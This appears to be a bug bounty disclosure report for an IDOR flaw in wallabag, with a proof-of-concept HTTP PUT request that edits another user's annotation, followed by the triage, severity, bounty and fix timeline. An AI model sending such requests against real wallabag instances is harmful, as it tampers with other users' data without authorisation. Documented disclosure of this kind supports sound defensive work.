IDOR vulnerability allowing to update another user's annotations in wallabag/wallabag

Valid

Reported on

Jan 22nd 2023


Description

IDOR vulnerability was discovered in wallabag.

Proof of Concept

  1. Login as a victim.
  2. Create an entry and an annotation. In this case the annotation's ID is 3.
  3. Login as an attacker.
  4. Send the following request.

request

PUT /annotations/3 HTTP/1.1
Host: localhost:8000
Cookie: PHPSESSID=e23e2dfc1b530c1884bf17248448b979
Content-Length: 21

{"id":3,"text":"xxx"}
  1. Victim's annotation created on step 2 is updated.

Impact

An attacker can update another user's annotations.

We are processing your report and will contact the wallabag team within 24 hours. a year ago
We have contacted a member of the wallabag team and are waiting to hear back a year ago
wallabag/wallabag maintainer has acknowledged this report a year ago
Kevin Decherf modified the Severity from Medium (4.3) to Medium (5.4) a year ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Kevin Decherf validated this vulnerability a year ago

Changing CVSS score to 5.4 as there is a limited loss of confidentiality. Response from the call returns the annotated text

bauh0lz has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Kevin Decherf marked this as fixed in 2.5.3 with commit 5ac6b6 a year ago
Kevin Decherf has been awarded the fix bounty
This vulnerability has now been published a year ago
wallabag/wallabag maintainer gave praise a year ago
Thank you!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
to join this conversation